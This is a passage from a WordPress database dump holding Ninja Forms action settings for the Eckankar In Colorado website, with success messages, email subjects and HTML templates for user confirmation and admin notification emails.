Message'),(7519,253,'objectType','Action','objectType','Action'),(7520,253,'objectDomain','actions','objectDomain','actions'),(7521,253,'editActive','','editActive',''),(7522,253,'message','Your form has been successfully submitted.','message','Your form has been successfully submitted.'),(7523,253,'order','1','order','1'),(7524,253,'payment_gateways','','payment_gateways',''),(7525,253,'payment_total','0','payment_total','0'),(7526,253,'tag','','tag',''),(7527,253,'to','{wp:admin_email}','to','{wp:admin_email}'),(7528,253,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(7529,253,'email_message','{fields_table}','email_message','{fields_table}'),(7530,253,'from_name','','from_name',''),(7531,253,'from_address','','from_address',''),(7532,253,'reply_to','','reply_to',''),(7533,253,'email_format','html','email_format','html'),(7534,253,'cc','','cc',''),(7535,253,'bcc','','bcc',''),(7536,253,'attach_csv','','attach_csv',''),(7537,253,'redirect_url','','redirect_url',''),(7538,253,'success_msg','<div class=\"boldgrid-section color1-background-color color-1-text-contrast bg-background-color\"><div class=\"container\"><div class=\"row\" style=\"padding-top: 100px; padding-bottom: 100px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><p class=\"\" style=\"text-align: center; color: #23507d; font-size: 41px; font-family: Open Sans; font-weight: 600;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Thank You For Registering!</p><p class=\"\" style=\"text-align: center; font-size: 28px; font-family: Open Sans; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">We appreciate you taking the time to complete your Satsang Class registration.<br>The Arahata for the class you have chosen will be contacting you before the class starts.</p></div></div></div></div>','success_msg','<div class=\"boldgrid-section color1-background-color color-1-text-contrast bg-background-color\"><div class=\"container\"><div class=\"row\" style=\"padding-top: 100px; padding-bottom: 100px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><p class=\"\" style=\"text-align: center; color: #23507d; font-size: 41px; font-family: Open Sans; font-weight: 600;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Thank You For Registering!</p><p class=\"\" style=\"text-align: center; font-size: 28px; font-family: Open Sans; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">We appreciate you taking the time to complete your Satsang Class registration.<br>The Arahata for the class you have chosen will be contacting you before the class starts.</p></div></div></div></div>'),(7539,253,'parent_id','37','parent_id','37'),(7540,253,'email_message_plain','','email_message_plain',''),(7541,253,'submitter_email','','submitter_email',''),(7542,253,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(7543,253,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(7544,253,'set_subs_to_expire','0','set_subs_to_expire','0'),(7545,253,'subs_expire_time','90','subs_expire_time','90'),(7546,253,'drawerDisabled','','drawerDisabled',''),(7547,254,'title','','title',''),(7548,254,'key','','key',''),(7549,254,'type','save','type','save'),(7550,254,'active','1','active','1'),(7551,254,'created_at','2018-01-03 11:44:32','created_at','2018-01-03 11:44:32'),(7552,254,'label','Save Form','label','Save Form'),(7553,254,'objectType','Action','objectType','Action'),(7554,254,'objectDomain','actions','objectDomain','actions'),(7555,254,'editActive','','editActive',''),(7556,254,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(7557,254,'payment_gateways','','payment_gateways',''),(7558,254,'payment_total','0','payment_total','0'),(7559,254,'tag','','tag',''),(7560,254,'to','{wp:admin_email}','to','{wp:admin_email}'),(7561,254,'reply_to','','reply_to',''),(7562,254,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(7563,254,'email_message','{fields_table}','email_message','{fields_table}'),(7564,254,'email_message_plain','','email_message_plain',''),(7565,254,'from_name','','from_name',''),(7566,254,'from_address','','from_address',''),(7567,254,'email_format','html','email_format','html'),(7568,254,'cc','','cc',''),(7569,254,'bcc','','bcc',''),(7570,254,'redirect_url','','redirect_url',''),(7571,254,'parent_id','2','parent_id','2'),(7572,254,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(7573,254,'submitter_email','','submitter_email',''),(7574,254,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(7575,254,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(7576,254,'set_subs_to_expire','0','set_subs_to_expire','0'),(7577,254,'subs_expire_time','90','subs_expire_time','90'),(7578,254,'success_msg','Your form has been successfully submitted.','success_msg','Your form has been successfully submitted.'),(7579,255,'title','','title',''),(7580,255,'key','','key',''),(7581,255,'type','email','type','email'),(7582,255,'active','1','active','1'),(7583,255,'created_at','2018-01-03 11:44:32','created_at','2018-01-03 11:44:32'),(7584,255,'date_updated','2016-01-15','date_updated','2016-01-15'),(7585,255,'attach_csv','0','attach_csv','0'),(7586,255,'email_format','html','email_format','html'),(7587,255,'reply_to','','reply_to',''),(7588,255,'cc','','cc',''),(7589,255,'bcc','','bcc',''),(7590,255,'redirect_url','','redirect_url',''),(7591,255,'success_msg','','success_msg',''),(7592,255,'from_name','Eckankar In Colorado','from_name','Eckankar In Colorado'),(7593,255,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(7594,255,'to','{field:email_144}','to','{field:email_144}'),(7595,255,'email_subject','Loveland Initiator and ESA','email_subject','Loveland Initiator and ESA'),(7596,255,'label','Send copy to user','label','Send copy to user'),(7597,255,'objectType','Action','objectType','Action'),(7598,255,'objectDomain','actions','objectDomain','actions'),(7599,255,'editActive','','editActive',''),(7600,255,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(7601,255,'payment_gateways','','payment_gateways',''),(7602,255,'payment_total','0','payment_total','0'),(7603,255,'tag','','tag',''),(7604,255,'email_message_plain','','email_message_plain',''),(7605,255,'parent_id','2','parent_id','2'),(7606,255,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(7607,255,'email_message','      <meta http-equiv=\"content-type\" content=\"text/html; charset=UTF-8\">    <meta name=\"viewport\" content=\"width=device-width,initial-scale=1\">    <meta name=\"x-apple-disable-message-reformatting\">    <title>Ninja Forms- User Confirmation</title>    <!--[if mso]>  <noscript>    <xml>      <o:OfficeDocumentSettings>        <o:PixelsPerInch>96</o:PixelsPerInch>      </o:OfficeDocumentSettings>    </xml>  </noscript>  <![endif]-->    <style>    table, td, div, h1, p {font-family: Arial, sans-serif;}  </style>        <table role=\"presentation\" style=\"width:100%;border-collapse:collapse;border:0;border-spacing:0;background:#ffffff;\">      <tbody>        <tr>          <td style=\"padding:0;\" align=\"center\">            <table role=\"presentation\" style=\"width:602px;border-collapse:collapse;border:1px solid #cccccc;border-spacing:0;text-align:left;\">              <tbody>                <tr>                  <td style=\"padding: 20px 0px; background: white none repeat scroll 0% 0%; font-size: 50px; line-height: 10px; font-weight: 600;\" align=\"center\"><span style=\"color: #4f759b;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\"> </span><span style=\"color: #666666;\"> </span></td>                </tr>                <tr>                  <td style=\"padding:5px 30px 20px 30px;\">                    <table role=\"presentation\" style=\"width:100%;border-collapse:collapse;border:0;border-spacing:0;\">                      <tbody>                        <tr>                          <td style=\"padding:0 0 20px 0;color:#153643;\">                            <div style=\"text-align: center; \"><span id=\"nf-drawer-content\"><span class=\"nf-setting-groups\"><span class=\"nf-field-settings\">                                    <p style=\"font-size:25px;\"><strong>Hello                                        {field:textbox_142}</strong></p>                                    <p style=\"font-size:22px;\">Thanks for                                      getting in touch!</p>                                    <p style=\"font-size:17px;\">You have created                                      a new form submission on the Eckankar In                                      Colorado website requesting contact with a                                      person on the Loveland ECK Leadership                                      Communications team.</p>                                    <p style=\"font-size:17px;\">You will be                                      contacted soon regarding your inquiry.</p>                                    <p style=\"font-size:19px;\"><strong>Here is a                                        copy of the information that you have                                        submitted:</strong><span><span class=\"nf-setting-groups\"><span class=\"nf-field-settings\"></span></span></span></p>                                  </span></span></span></div>                          </td>                        </tr>                        <tr>                          <td style=\"padding:0;\">                            <table role=\"presentation\" style=\"width:100%;border-collapse:collapse;border:0;border-spacing:0;\">                              <tbody>                                <tr>                                  <td style=\"width:260px;padding:0;vertical-align:top;color:#153643;\">                                    <table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\" border=\"0\">                                      <tbody>                                        <tr>                                          <td style=\"background-color: #efefef;padding: 10px;border: 1px solid #cccccc;\" valign=\"top\" align=\"left; \">                                            <p><span style=\"color: #333333\"><strong>FIRST                                                  NAME:</strong>                                                {field:textbox_142}<br>                                                <br>                                              </span><span style=\"color: #333333\"><strong>LAST                                                  NAME:</strong>                                                {field:lastname_143}<br>                                                <br>                                              </span><span style=\"color: #333333\"><strong>EMAIL:</strong>                                                {field:email_144}<br>                                                <br>                                              </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong>                                                {field:phone_145}</span><br>                                              <br>                                              <span style=\"color: #333333\"><strong>LOCAL                                                  AREA:</strong>                                                {field:listselect_146}<br>                                                <br>                                              </span><span style=\"color: #333333\"><strong>PERSON                                                  YOU WOULD LIKE TO                                                  CONTACT:&nbsp;</strong>{field:select_the_person_you_would_like_to_contact_1613166666321}</span></p>                                            <p><span style=\"color: #333333\"><strong>MESSAGE:                                                  </strong>{field:textarea_150}</span></p>                                          </td>                                        </tr>                                      </tbody>                                    </table>                                  </td>                                </tr>                              </tbody>                            </table>                          </td>                        </tr>                      </tbody>                    </table>                  </td>                </tr>                <tr>                  <td style=\"padding:30px;background:#c95f13;\">                    <table role=\"presentation\" style=\"width:100%;border-collapse:collapse;border:0;border-spacing:0;font-size:16px;font-family:Arial,sans-serif;\">                      <tbody>                        <tr>                          <td style=\"padding:0;\" align=\"center\">                            <p style=\"margin:0;font-size:16px;line-height:22px;font-family:Arial,sans-serif;color:#ffffff;\">If                              you have any questions regarding the origin of                              this form, please feel free to contact                              the Eckankar In Colorado webmaster: <br>                              <a href=\"mailto:webmaster@eckankar-colorado.org\" style=\"color: #ffffff;\">webmaster@eckankar-colorado.org</a><br>                              <br>                              <a href=\"https://www.eckankar-colorado.org\" style=\"color: #ffffff;\">Eckankar                                In Colorado</a> </p>                          </td>                        </tr>                      </tbody>                    </table>                  </td>                </tr>              </tbody>            </table>          </td>        </tr>      </tbody>    </table>  ','email_message','      <meta http-equiv=\"content-type\" content=\"text/html; charset=UTF-8\">    <meta name=\"viewport\" content=\"width=device-width,initial-scale=1\">    <meta name=\"x-apple-disable-message-reformatting\">    <title>Ninja Forms- User Confirmation</title>    <!--[if mso]>  <noscript>    <xml>      <o:OfficeDocumentSettings>        <o:PixelsPerInch>96</o:PixelsPerInch>      </o:OfficeDocumentSettings>    </xml>  </noscript>  <![endif]-->    <style>    table, td, div, h1, p {font-family: Arial, sans-serif;}  </style>        <table role=\"presentation\" style=\"width:100%;border-collapse:collapse;border:0;border-spacing:0;background:#ffffff;\">      <tbody>        <tr>          <td style=\"padding:0;\" align=\"center\">            <table role=\"presentation\" style=\"width:602px;border-collapse:collapse;border:1px solid #cccccc;border-spacing:0;text-align:left;\">              <tbody>                <tr>                  <td style=\"padding: 20px 0px; background: white none repeat scroll 0% 0%; font-size: 50px; line-height: 10px; font-weight: 600;\" align=\"center\"><span style=\"color: #4f759b;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\"> </span><span style=\"color: #666666;\"> </span></td>                </tr>                <tr>                  <td style=\"padding:5px 30px 20px 30px;\">                    <table role=\"presentation\" style=\"width:100%;border-collapse:collapse;border:0;border-spacing:0;\">                      <tbody>                        <tr>                          <td style=\"padding:0 0 20px 0;color:#153643;\">                            <div style=\"text-align: center; \"><span id=\"nf-drawer-content\"><span class=\"nf-setting-groups\"><span class=\"nf-field-settings\">                                    <p style=\"font-size:25px;\"><strong>Hello                                        {field:textbox_142}</strong></p>                                    <p style=\"font-size:22px;\">Thanks for                                      getting in touch!</p>                                    <p style=\"font-size:17px;\">You have created                                      a new form submission on the Eckankar In                                      Colorado website requesting contact with a                                      person on the Loveland ECK Leadership                                      Communications team.</p>                                    <p style=\"font-size:17px;\">You will be                                      contacted soon regarding your inquiry.</p>                                    <p style=\"font-size:19px;\"><strong>Here is a                                        copy of the information that you have                                        submitted:</strong><span><span class=\"nf-setting-groups\"><span class=\"nf-field-settings\"></span></span></span></p>                                  </span></span></span></div>                          </td>                        </tr>                        <tr>                          <td style=\"padding:0;\">                            <table role=\"presentation\" style=\"width:100%;border-collapse:collapse;border:0;border-spacing:0;\">                              <tbody>                                <tr>                                  <td style=\"width:260px;padding:0;vertical-align:top;color:#153643;\">                                    <table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\" border=\"0\">                                      <tbody>                                        <tr>                                          <td style=\"background-color: #efefef;padding: 10px;border: 1px solid #cccccc;\" valign=\"top\" align=\"left; \">                                            <p><span style=\"color: #333333\"><strong>FIRST                                                  NAME:</strong>                                                {field:textbox_142}<br>                                                <br>                                              </span><span style=\"color: #333333\"><strong>LAST                                                  NAME:</strong>                                                {field:lastname_143}<br>                                                <br>                                              </span><span style=\"color: #333333\"><strong>EMAIL:</strong>                                                {field:email_144}<br>                                                <br>                                              </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong>                                                {field:phone_145}</span><br>                                              <br>                                              <span style=\"color: #333333\"><strong>LOCAL                                                  AREA:</strong>                                                {field:listselect_146}<br>                                                <br>                                              </span><span style=\"color: #333333\"><strong>PERSON                                                  YOU WOULD LIKE TO                                                  CONTACT:&nbsp;</strong>{field:select_the_person_you_would_like_to_contact_1613166666321}</span></p>                                            <p><span style=\"color: #333333\"><strong>MESSAGE:                                                  </strong>{field:textarea_150}</span></p>                                          </td>                                        </tr>                                      </tbody>                                    </table>                                  </td>                                </tr>                              </tbody>                            </table>                          </td>                        </tr>                      </tbody>                    </table>                  </td>                </tr>                <tr>                  <td style=\"padding:30px;background:#c95f13;\">                    <table role=\"presentation\" style=\"width:100%;border-collapse:collapse;border:0;border-spacing:0;font-size:16px;font-family:Arial,sans-serif;\">                      <tbody>                        <tr>                          <td style=\"padding:0;\" align=\"center\">                            <p style=\"margin:0;font-size:16px;line-height:22px;font-family:Arial,sans-serif;color:#ffffff;\">If                              you have any questions regarding the origin of                              this form, please feel free to contact                              the Eckankar In Colorado webmaster: <br>                              <a href=\"mailto:webmaster@eckankar-colorado.org\" style=\"color: #ffffff;\">webmaster@eckankar-colorado.org</a><br>                              <br>                              <a href=\"https://www.eckankar-colorado.org\" style=\"color: #ffffff;\">Eckankar                                In Colorado</a> </p>                          </td>                        </tr>                      </tbody>                    </table>                  </td>                </tr>              </tbody>            </table>          </td>        </tr>      </tbody>    </table>  '),(7608,256,'title','','title',''),(7609,256,'key','','key',''),(7610,256,'type','successmessage','type','successmessage'),(7611,256,'active','1','active','1'),(7612,256,'created_at','2018-01-03 11:44:32','created_at','2018-01-03 11:44:32'),(7613,256,'date_updated','2016-01-15','date_updated','2016-01-15'),(7614,256,'success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p></div>','success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p></div>'),(7615,256,'from_name','','from_name',''),(7616,256,'from_address','','from_address',''),(7617,256,'to','{wp:admin_email}','to','{wp:admin_email}'),(7618,256,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(7619,256,'email_message','{fields_table}','email_message','{fields_table}'),(7620,256,'attach_csv','0','attach_csv','0'),(7621,256,'email_format','html','email_format','html'),(7622,256,'reply_to','','reply_to',''),(7623,256,'cc','','cc',''),(7624,256,'bcc','','bcc',''),(7625,256,'redirect_url','','redirect_url',''),(7626,256,'label','Success Message','label','Success Message'),(7627,256,'objectType','Action','objectType','Action'),(7628,256,'objectDomain','actions','objectDomain','actions'),(7629,256,'editActive','','editActive',''),(7630,256,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(7631,256,'payment_gateways','','payment_gateways',''),(7632,256,'payment_total','0','payment_total','0'),(7633,256,'tag','','tag',''),(7634,256,'email_message_plain','','email_message_plain',''),(7635,256,'parent_id','2','parent_id','2'),(7636,256,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(7637,256,'submitter_email','','submitter_email',''),(7638,256,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(7639,256,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(7640,256,'set_subs_to_expire','0','set_subs_to_expire','0'),(7641,256,'subs_expire_time','90','subs_expire_time','90'),(7642,256,'drawerDisabled','','drawerDisabled',''),(7643,257,'title','','title',''),(7644,257,'key','','key',''),(7645,257,'type','email','type','email'),(7646,257,'active','1','active','1'),(7647,257,'created_at','2018-01-03 11:44:32','created_at','2018-01-03 11:44:32'),(7648,257,'date_updated','2016-01-19','date_updated','2016-01-19'),(7649,257,'from_name','Loveland Initiators and ESAâs','from_name','Loveland Initiators and ESAâs'),(7650,257,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(7651,257,'to','webmaster@eckankar-colorado.org','to','webmaster@eckankar-colorado.org'),(7652,257,'email_subject','ECK Colorado Website - Form Record Received','email_subject','ECK Colorado Website - Form Record Received'),(7653,257,'attach_csv','0','attach_csv','0'),(7654,257,'email_format','html','email_format','html'),(7655,257,'reply_to','','reply_to',''),(7656,257,'cc','','cc',''),(7657,257,'bcc','','bcc',''),(7658,257,'redirect_url','','redirect_url',''),(7659,257,'success_msg','','success_msg',''),(7660,257,'label','Admin Email','label','Admin Email'),(7661,257,'objectType','Action','objectType','Action'),(7662,257,'objectDomain','actions','objectDomain','actions'),(7663,257,'editActive','','editActive',''),(7664,257,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(7665,257,'payment_gateways','','payment_gateways',''),(7666,257,'payment_total','0','payment_total','0'),(7667,257,'tag','','tag',''),(7668,257,'email_message_plain','','email_message_plain',''),(7669,257,'drawerDisabled','','drawerDisabled',''),(7670,257,'parent_id','2','parent_id','2'),(7671,257,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(7672,257,'email_message','      <meta charset=\"UTF-8\">    <meta name=\"viewport\" content=\"width=device-width,initial-scale=1\">    <meta name=\"x-apple-disable-message-reformatting\">    <title>Ninja Forms - ADMIN NOTIFICATION-FINAL</title>    <!--[if mso]>  <noscript>    <xml>      <o:OfficeDocumentSettings>        <o:PixelsPerInch>96</o:PixelsPerInch>      </o:OfficeDocumentSettings>    </xml>  </noscript>  <![endif]-->    <style>    table, td, div, h1, p {font-family: Arial, sans-serif;}  </style>        <table role=\"presentation\" style=\"width:100%;border-collapse:collapse;border:0;border-spacing:0;background:#ffffff;\">      <tbody>        <tr>          <td style=\"padding:0;\" align=\"center\">            <table role=\"presentation\" style=\"width:602px;border-collapse:collapse;border:1px solid #cccccc;border-spacing:0;text-align:left;\">            </table>            <table role=\"presentation\" style=\"width:602px;border-collapse:collapse;border:1px solid #cccccc;border-spacing:0;text-align:center;\">              <tbody>                <tr>                  <td style=\"padding: 20px 0px; background: white none repeat scroll 0% 0%; font-size: 50px; line-height: 10px; font-weight: 600;\" align=\"center\"><span style=\"color: #4f759b;\">Admin                      Notification<br>                    </span><span style=\"color: #666666;\"> </span></td>                </tr>                <tr>                  <td style=\"padding:36px 30px 42px 30px;\">                    <table role=\"presentation\" style=\"width:100%;border-collapse:collapse;border:0;border-spacing:0; margin-top: -25px;\">                      <tbody>                        <tr>                          <td style=\"padding:0 0 20px 0;color:#153643; \">                            <p style=\"font-size: 20px; margin: 0px 0px 20px; font-family: Arial,sans-serif; text-align: center;font-size:30px; color:#f28a27;\"><strong>New                                <strong><span id=\"nf-drawer-content\" style=\"color: #4f759b;\"><span></span></span></strong></strong></p>                            <strong><strong> </strong>                              <p style=\"color: #23507d;text-align:center;font-size:23px;\" class=\"nf-setting-groups\"><strong><span class=\"nf-field-settings\">{form:title}</span><span>                                  </span>Form Submission</strong></p>                            </strong>                            <div style=\"text-align: center;\"><strong> This form                                was generated from a user submission on the <em>Eckankar                                  In Colorado</em> website. You are receiving                                this submission because you are listed as a                                contact for the <em>Loveland ECK Leadership                                  organization</em>.</strong><br>                              <strong> <strong></strong></strong><br>                              <strong><strong> The following person has                                  requested contact with an ECK representative.                                  Here is the information that <span style=\"color: #666666\">{field:textbox_142}                                    {field:lastname_143}</span> has submitted:</strong>                              </strong></div>                            <strong>                              <p></p>                            </strong></td>                        </tr>                        <tr>                          <td style=\"padding:0;\">                            <table role=\"presentation\" style=\"width:100%;border-collapse:collapse;border:0;border-spacing:0;\">                              <tbody>                                <tr>                                  <td style=\"width:260px;padding:0;vertical-align:top;color:#153643;\">                                    <table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\" border=\"0\">                                      <tbody>                                        <tr>                                          <td style=\"background-color: #efefef;padding: 10px;border: 1px solid #cccccc; text-align:left;\" valign=\"top\" align=\"left; \">                                            <p><span style=\"color: #333333\"><strong>FIRST                                                  NAME:</strong>                                                {field:textbox_142}<br>                                                <br>                                              </span><span style=\"color: #333333\"><strong>LAST                                                  NAME:</strong>                                                {field:lastname_143}<br>                                                <br>                                              </span><span style=\"color: #333333\"><strong>EMAIL:</strong>                                                {field:email_144}<br>                                                <br>                                              </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong>                                                {field:phone_145}</span><br>                                              <br>                                              <span style=\"color: #333333\"><strong>LOCAL                                                  AREA:</strong>                                                {field:listselect_146}<br>                                                <br>                                              </span><span style=\"color: #333333\"><strong>PERSON                                                  YOU WOULD LIKE TO                                                  CONTACT:&nbsp;</strong>{field:select_the_person_you_would_like_to_contact_1613166666321}</span></p>                                            <p><span style=\"color: #333333\"><strong>MESSAGE:                                                  </strong>{field:textarea_150}</span></p>                                          </td>                                        </tr>                                      </tbody>                                    </table>                                  </td>                                </tr>                              </tbody>                            </table>                          </td>                        </tr>                      </tbody>                    </table>                  </td>                </tr>                <tr>                  <td style=\"padding:30px;background:#7393B3;\">                    <table role=\"presentation\" style=\"width:100%;border-collapse:collapse;border:0;border-spacing:0;font-size:16px;font-family:Arial,sans-serif;\">                      <tbody>                        <tr>                          <td style=\"padding:0;\" align=\"center\">                            <p style=\"margin:0;font-size:16px;line-height:22px;font-family:Arial,sans-serif;color:#ffffff;\">If                              you have any questions regarding the origin of                              this form, please feel free to contact the                              Eckankar In Colorado webmaster: <br>                              <span style=\"color #ffffff;\">                                webmaster@eckankar-colorado.org</span><br>                              <br>                              <a href=\"https://www.eckankar-colorado.org\" style=\"color: #ffffff;\">Eckankar                                In Colorado</a> </p>                          </td>                        </tr>                      </tbody>                    </table>                  </td>                </tr>              </tbody>            </table>          </td>        </tr>      </tbody>    </table>      ','email_message','      <meta charset=\"UTF-8\">    <meta name=\"viewport\" content=\"width=device-width,initial-scale=1\">    <meta name=\"x-apple-disable-message-reformatting\">    <title>Ninja Forms - ADMIN NOTIFICATION-FINAL</title>    <!--[if mso]>  <noscript>    <xml>      <o:OfficeDocumentSettings>        <o:PixelsPerInch>96</o:PixelsPerInch>      </o:OfficeDocumentSettings>    </xml>  </noscript>  <![endif]-->    <style>    table, td, div, h1, p {font-family: Arial, sans-serif;}  </style>        <table role=\"presentation\" style=\"width:100%;border-collapse:collapse;border:0;border-spacing:0;background:#ffffff;\">      <tbody>        <tr>          <td style=\"padding:0;\" align=\"center\">            <table role=\"presentation\" style=\"width:602px;border-collapse:collapse;border:1px solid #cccccc;border-spacing:0;text-align:left;\">            </table>            <table role=\"presentation\" style=\"width:602px;border-collapse:collapse;border:1px 